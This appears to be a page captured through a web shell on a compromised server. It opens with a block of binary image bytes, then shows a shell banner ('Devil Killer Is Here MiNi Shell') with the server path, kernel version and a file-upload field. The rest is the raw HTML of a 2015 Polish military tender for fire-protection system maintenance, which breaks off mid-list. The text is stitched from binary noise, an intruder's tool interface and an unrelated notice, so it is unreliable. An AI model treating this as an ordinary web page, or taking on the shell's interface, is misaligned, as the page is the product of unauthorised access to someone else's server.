JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150430/99748-N-2015.html

<p class="kh_header"><b>Poznań: ŚWIADCZENIE  USŁUG  W  ZAKRESIE  KONSERWACJI  I  SERWISOWANIA  INSTALACJI PRZECIWPOŻAROWYCH W  OBIEKTACH ADMINISTROWANYCH  przez JW 1156</b><br>
<b>Numer ogłoszenia: 99748 - 2015; data zamieszczenia: 30.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 1156 , ul. Silniki 1, 61-325 Poznań, woj. wielkopolskie, tel. (61) 8548 611.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.31blt.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE  USŁUG  W  ZAKRESIE  KONSERWACJI  I  SERWISOWANIA  INSTALACJI PRZECIWPOŻAROWYCH W  OBIEKTACH ADMINISTROWANYCH  przez JW 1156.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie konserwacji i serwisowania instalacji przeciwpożarowych w obiektach administrowanych przez JW 1156 Poznań-Krzesiny, a zlokalizowanych w miejscowościach: Babki, Poznań, Leszno, Śrem.

Zamawiający dopuszcza składanie ofert częściowych, z podziałem na zadania:

ZADANIE NR 1  - Konserwacja instalacji przeciwpożarowych  w kompleksach nr 4246 i 7887 w m. Babki.
ZADANIE NR 2   - Konserwacja instalacji przeciwpożarowych  w kompleksie nr 2744 Poznań; ul. Kościuszki 92/98.
ZADANIE NR 3  - Konserwacja instalacji przeciwpożarowych  w kompleksach nr 2972 i 5449  w m. Leszno.
ZADANIE NR 4  - Konserwacja instalacji przeciwpożarowych  w kompleksie nr 2982
 w m. Śrem
W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do utrzymywania w stałej sprawności technicznej przekazanych w konserwację i serwisowanie :
- instalacji sygnalizacji pożaru,
- stałych systemów i urządzeń gaśniczych,
- urządzeń wentylacji oddymiającej,
- klap i okien dymowych i klap przeciwpożarowych odcinających,
- dźwiękowych systemów ostrzegawczych,
- innych urządzeń pomocniczych współpracujących z instalacją wykrywania i alarmowania 
pożarowego w tym EBI (komunikacja).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6  w wysokości 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 31.62.51.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta składana w zadaniach: od 1 do 2  musi być zabezpieczona wadium w PLN w wysokości odpowiednim do danego zadania:  

ZADANIE NR 1 - 1 500,00 zł
ZADANIE NR 2 - 2 000,00 zł

2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  Nr 109,  poz. 1158, z późn. zm.).
4.W przypadku wniesienia wadium w pieniądzu wykonawca wpłaca wadium przelewem na rachunek bankowy: Jednostka Wojskowa 1156  NBP O/O Poznań nr konta  64 1010 1469 0048 0613 9120 0000  odpowiednio z dopiskiem - Wadium  Świadczenie usług w zakresie konserwacji i serwisowania instalacji przeciwpożarowych w obiektach administrowanych przez JW. 1156
5. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na
      rachunku bankowym zamawiającego. Wadium wniesione w pieniądzu zamawiający  przechowuje na rachunku bankowym.
6. W przypadku wniesienia wadium w gwarancji lub poręczeniu ich treść musi zawierać okoliczności zatrzymania wadium przez Zamawiającego wynikające z art. 46 ust.4a-5 ustawy Pzp.
7. W przypadku wniesienia wadium w innej formie niż pieniądz wykonawca załącza do oferty kopię dokumentu stwierdzającego wniesienie wadium potwierdzoną za zgodność z oryginałem i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty.
8. Oferta, która nie będzie zabezpieczona na okres określony w ustawie dopuszczalną formą wadium, nie będzie rozpatrywana, a Wykonawca zostanie wykluczony z postępowania o udzielenie zamówienia publicznego.
9. Wadium należy wnieść zgodnie z postanowieniami art. 45 ustawy Prawo zamówień publicznych.
10. Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.
11. Zamawiający zwróci lub zatrzyma wadium zgodnie z postanowieniami art. 46 ustawy Prawo zamówień publicznych.
12. W zakresie zadania nr 3, 4 nie jest wymagane wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy ZADANIA 1 
Zamawiający w zakresie tego warunku wymaga, aby Wykonawca:
- posiadał ważne świadectwo bezpieczeństwa przemysłowego  min. III stopnia potwierdzające zdolność do ochrony informacji niejawnych o klauzuli min. POUFNE (podstawa: art.54 i 55 ustawy z dnia 5 sierpnia 2010 roku o ochronie informacji niejawnych Dz. U. z 2010r.  Nr 182, poz. 1228 z późn. zm.)

dotyczy ZADANIA 2 
Zamawiający w zakresie tego warunku wymaga, aby Wykonawca:
- posiadał ważne świadectwo bezpieczeństwa przemysłowego  min. III stopnia potwierdzające zdolność do ochrony informacji niejawnych o klauzuli min. POUFNE (podstawa: art.54 i 55 ustawy z dnia 5 sierpnia 2010 roku o ochronie informacji niejawnych Dz. U. z 2010r.  Nr 182, poz. 1228 z późn. zm.)

- posiadał  zezwolenie Prezesa Państwowej Agencji Atomistyki na działalność w zakresie konserwacji  i kontroli szczelności źródeł izotopowych czujek dymu, na podstawie ustawy - Prawo atomowe (Dz. U. z 2001r. nr 100, poz. 1085, nr 154, poz. 1800, Dz. U. z  2006 nr 140 poz. 994 ).

dotyczy ZADANIA 3
Zamawiający w zakresie tego warunku wymaga, aby Wykonawca:
- posiadał ważne świadectwo bezpieczeństwa przemysłowego  min. III stopnia potwierdzające zdolność do ochrony informacji niejawnych o klauzuli min. POUFNE (podstawa: art.54 i 55 ustawy z dnia 5 sierpnia 2010 roku o ochronie informacji niejawnych Dz. U. z 2010r.  Nr 182, poz. 1228 z późn. zm.

- posiadał  zezwolenie Prezesa Państwowej Agencji Atomistyki na działalność w zakresie konserwacji  i kontroli szczelności źródeł izotopowych czujek dymu, na podstawie ustawy - Prawo atomowe (Dz. U. z 2001r. nr 100, poz. 1085, nr 154, poz. 1800, Dz. U. z  2006 nr 140 poz. 994 ).

dotyczy ZADANIA 4
Zamawiający w zakresie tego warunku wymaga, aby Wykonawca:
- posiadał zezwolenie Prezesa Państwowej Agencji Atomistyki na działalność w zakresie konserwacji  i kontroli szczelności źródeł izotopowych czujek dymu, na podstawie ustawy - Prawo atomowe (Dz. U. z 2001r. nr 100, poz. 1085, nr 154, poz. 1800, Dz. U. z  2006 nr 140 poz. 994 ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał się wykonaniem,  a w przypadku świadczeń okresowych lub ciągłych  również wykonywaniem, głównych  usług w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy  - w tym okresie, minimum dwóch usług  w zakresie konserwacji i serwisowania instalacji przeciwpożarowych o łącznej  wartości brutto min.: 
Dla ZADANIA 1 - 40.000,00 zł 
Dla ZADANIA 2 - 40.000,00 zł 
do oferty należy dołączyć dokumenty, z których będzie wynikało, że usługi wykonane zostały (wykonywane są)  należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca  dysponował osobami zdolnymi do wykonania    zamówienia tj.

dotyczy ZADANIA 1:
- dysponował minimum 2 osobami z certyfikatem poświadczającym odbycie szkolenia w zakresie instalowania, obsługi i pełnego serwisowania systemu sygnalizacji pożaru XLS80e Honeywell;
- dysponował minimum 2 osobami z imiennym świadectwem ukończenia szkolenia z Interaktywnego Systemu Sygnalizacji Pożarowej POLON 4000;
- dysponował minimum 2 osobami  posiadającymi stosowne Świadectwa Kwalifikacyjne  wydane na podstawie Rozporządzenia Ministra Gospodarki , Pracy i Polityki Społecznej z dnia 28.04.2003r. ( Dz. U. Nr 89 poz. 828 z późniejszymi zmianami ): serii E Grupa 1 pkt 2, 5 i 10  i D Grupa 1 pkt 10; 
 - każda z osób wskazana do realizacji zadania, wpisana w wykaz osób zgodnie z załącznikiem 15 do SIWZ musi posiadać aktualne poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych o klauzuli min.: POUFNE.
(podstawa prawna: Ustawa o ochronie informacji niejawnych z dnia 05.08.2010 z Dz. U. 2010 nr 182 poz. 1228 oraz Rozporządzenie Ministra Obrony Narodowej z dnia 19 grudnia 2013r. poz. 1660 w sprawie szczegółowych zadań pełnomocników ochrony oraz szczególnych wymagań w zakresie ochrony jednostek organizacyjnych podległych Ministrowi Obrony Narodowej lub przez niego nadzorowanych).

dotyczy ZADANIA 2:
- dysponował minimum 2 osobami   z certyfikatem poświadczającym odbycie szkolenia w zakresie instalowania, obsługi i pełnego serwisowania dla instalatorów w zakresie instalacji ESSER;
- dysponował minimum 2 osobami z imiennym świadectwem ukończenia szkolenia z Interaktywnego Systemu Sygnalizacji Pożarowej POLON 4000;
- dysponował minimum 2 osobami  posiadającymi stosowne Świadectwa Kwalifikacyjne  wydane na podstawie Rozporządzenia Ministra Gospodarki , Pracy i Polityki Społecznej z dnia 28.04.2003r. ( Dz. U. Nr 89 poz. 828 z późniejszymi zmianami ): serii E Grupa 1 pkt 2, 5 i 10  i D Grupa 1 pkt 10
- każda z osób wskazana do realizacji zadania, wpisana w wykaz osób zgodnie z załącznikiem 15 do SIWZ musi posiadać aktualne poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych o klauzuli min.: POUFNE
(podstawa prawna: Ustawa o ochronie informacji niejawnych z dnia 05.08.2010 z Dz. U. 2010 nr 182 poz. 1228 oraz Rozporządzenie Ministra Obrony Narodowej z dnia 19 grudnia 2013r. poz. 1660 w sprawie szczegółowych zadań pełnomocników ochrony oraz szczególnych wymagań w zakresie ochrony jednostek organizacyjnych podległych Ministrowi Obrony Narodowej lub przez niego nadzorowanych).

 dotyczy ZADANIA 3: 
- dysponował minimum 2 osobami  posiadającymi stosowne Świadectwa Kwalifikacyjne wydane na podstawie Rozporządzenia Ministra Gospodarki ,Pracy i Polityki Społecznej z dnia 28.04.2003r. ( Dz. U. Nr 89 poz. 828 z późniejszymi zmianami ): serii E Grupa 1 pkt 2, 5 i 10  i D Grupa 1 pkt 10;
- każda z osób wskazana do realizacji zadania, wpisana w wykaz osób zgodnie z załącznikiem 15 do SIWZ musi posiadać aktualne poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych o klauzuli min.: POUFNE
(podstawa prawna: Ustawa o ochronie informacji niejawnych z dnia 05.08.2010 z Dz. U. 2010 nr 182 poz. 1228 oraz Rozporządzenie Ministra Obrony Narodowej z dnia 19 grudnia 2013r. poz. 1660 w sprawie szczegółowych zadań pełnomocników ochrony oraz szczególnych wymagań w zakresie ochrony jednostek organizacyjnych podległych Ministrowi Obrony Narodowej lub przez niego nadzorowanych).

dotyczy ZADANIA 4:
- dysponował minimum 1 osobą  posiadającą stosowne Świadectwa Kwalifikacyjne  wydane na podstawie Rozporządzenia Ministra Gospodarki , Pracy i Polityki Społecznej z dnia 28.04.2003r. ( Dz. U. Nr 89 poz. 828 z późniejszymi zmianami ): serii E Grupa 1 pkt 2, 5 i 10  i D Grupa 1 pkt 10</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny na etapie składania ofert;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany w treści niniejszej umowy mogą być dokonywane jedynie za zgodą obu stron i     wymagają formy pisemnej, pod rygorem nieważności. Przewiduje się możliwość wprowadzenia aneksem zmian w następujących przypadkach:
a)	w zakresie terminu wykonania przedmiotu umowy w przypadku:
- gdy zmiana wynika z uzasadnionego wniosku Użytkownika obiektu, który w 
  uzasadnionych przypadkach zawnioskuje o przesuniecie terminu realizacji umowy 
  lub zmianę harmonogramu w tym jeżeli taki wniosek uzasadnia ważny interes sił  
  zbrojnych RP
b)	w zakresie zmiany ceny jednostkowej wynagrodzenia w przypadku:
- wymienionym w § 3 pkt. 5.
       c)  zmiany osób reprezentujących strony umowy w szczególności w sytuacjach losowych i w sytuacji zmian organizacyjnych
1.1.zmiany w zakresie wskazanych dla realizacji umowy podwykonawców - w przypadku gdy w szczególności   podwykonawca wadliwie wykonuje umowę w tym zaprzestał jej wykonywania, lub w razie upadłości/likwidacji podwykonawcy
1.2.zakresu realizacji umowy - w szczególności gdy Zamawiający nie posiada środków  finansowych na realizację umowy wieloletniej w kolejnym roku, wyłączenia obiektu, urządzenia z użytkowania lub jego likwidacji,
2. W trakcie realizacji umowy dopuszcza się zmianę wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany:
     - stawki podatku od towarów i usług,
     - wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z   
      dnia  10 października 2002r. o minimalnym wynagrodzeniu za pracę, po przedstawieniu stosownych    
       dowodów dokumentujących zasadność wprowadzenia zmiany, odnosząc się do aktualizowanego na 
       bieżąco wykazu osób, który stanowi załącznik do umowy,
     - zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości 
        stawki składki na ubezpieczenie społeczne lub zdrowotne, po przedstawieniu stosownych 
       dowodów dokumentujących zasadność wprowadzenia zmiany, odnosząc się do aktualizowanego na
        bieżąco wykazu osób, który stanowi załącznik do umowy. 
3. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.31blt.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JW 1156
ul. Silniki 1
61-325 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 11:00, miejsce: JW 1156
ul. Silniki 1
61-325 Poznań 
Kancelaria Jawna pokój 101 w budynku sztabu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1  - Konserwacja instalacji przeciwpożarowych  w kompleksach nr 4246 i 7887 w m. Babki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do utrzymywania w stałej sprawności technicznej przekazanych w konserwację i serwisowanie :
- instalacji sygnalizacji pożaru,
- stałych systemów i urządzeń gaśniczych,
- urządzeń wentylacji oddymiającej,
- klap i okien dymowych i klap przeciwpożarowych odcinających,
- dźwiękowych systemów ostrzegawczych,
- innych urządzeń pomocniczych współpracujących z instalacją wykrywania i alarmowania 
pożarowego w tym EBI (komunikacja)

Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 14 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.62.51.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dojazdu awaryjnego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2   - Konserwacja instalacji przeciwpożarowych  w kompleksie nr 2744 Poznań; ul. Kościuszki 92/98..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do utrzymywania w stałej sprawności technicznej przekazanych w konserwację i serwisowanie :
- instalacji sygnalizacji pożaru,
- stałych systemów i urządzeń gaśniczych,
- urządzeń wentylacji oddymiającej,
- klap i okien dymowych i klap przeciwpożarowych odcinających,
- dźwiękowych systemów ostrzegawczych,
- innych urządzeń pomocniczych współpracujących z instalacją wykrywania i alarmowania 
pożarowego w tym EBI (komunikacja)

Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 14 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.62.51.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dojazdu awaryjnego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3  - Konserwacja instalacji przeciwpożarowych  w kompleksach nr 2972 i 5449  w m. Leszno..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do utrzymywania w stałej sprawności technicznej przekazanych w konserwację i serwisowanie :
- instalacji sygnalizacji pożaru,
- stałych systemów i urządzeń gaśniczych,
